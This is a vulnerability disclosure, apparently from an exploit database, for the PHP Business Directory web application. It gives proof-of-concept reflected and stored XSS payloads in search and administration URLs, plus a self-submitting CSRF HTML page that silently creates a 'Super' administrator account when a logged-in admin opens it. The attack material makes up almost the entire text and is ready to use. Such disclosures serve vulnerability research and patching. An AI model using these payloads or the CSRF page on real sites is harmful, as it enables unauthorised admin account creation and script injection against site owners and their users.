# Exploit Title: PHP Business Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip
--------------------------------------------------------------------------------

POC as follows :

# 0x00 Reflected XSS

---

1.In public search :

http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>

2.In administration web interface (need normal user login) :

http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>

# 0x01 Stored XSS

---

1.In administration web directory interface (need normal user login) :

http://192.168.1.112/phpbusinessdirectory/administration.php
?pageaction=newsavebusiness
&subaction=submit
&businessname=<script>alert(1)</script>
&slogan=<script>alert(2)</script>
&businesslicence=<script>alert(3)</script>
&address=<script>alert(4)</script>
&city=<script>alert(5)</script>
&suburb=<script>alert(6)</script>
&businessstate=<script>alert(7)</script>
&country=<script>alert(8)</script>
&zippostcode=<script>alert(9)/*
&telephone1=*/</script><script>alert(10)</script>
&telephone2=<script>alert(11)</script>
&mobilecell=<script>alert(12)</script>
&fax=<script>alert(13)</script>
&email=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&productservice=<script>alert(19)</script>
&manager=<script>alert(20)</script>
&paymentsaccepted=<script>alert(21)</script>

2.In administration web categories interface (need  administrator user login) :

http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>

# 0x02 CSRF (add Super user)

---

In http://192.168.1.103/csrf.html :

<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
      <input name="pageaction" value="saveuser" type="hidden" />
      <input name="subaction" value="submit" type="hidden" />
      <input name="username" value="larry_csrf" type="hidden" />
      <input name="password" value="larry_csrf" type="hidden" />
      <input name="userfullname" value="larry_csrf" type="hidden" />
      <input name="accesslevel" value="Super" type="hidden" />
      <input name="userstatus" value="active" type="hidden" />
      <input name="mysubmit" value="submit" type="submit" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

* Thanks to Besim *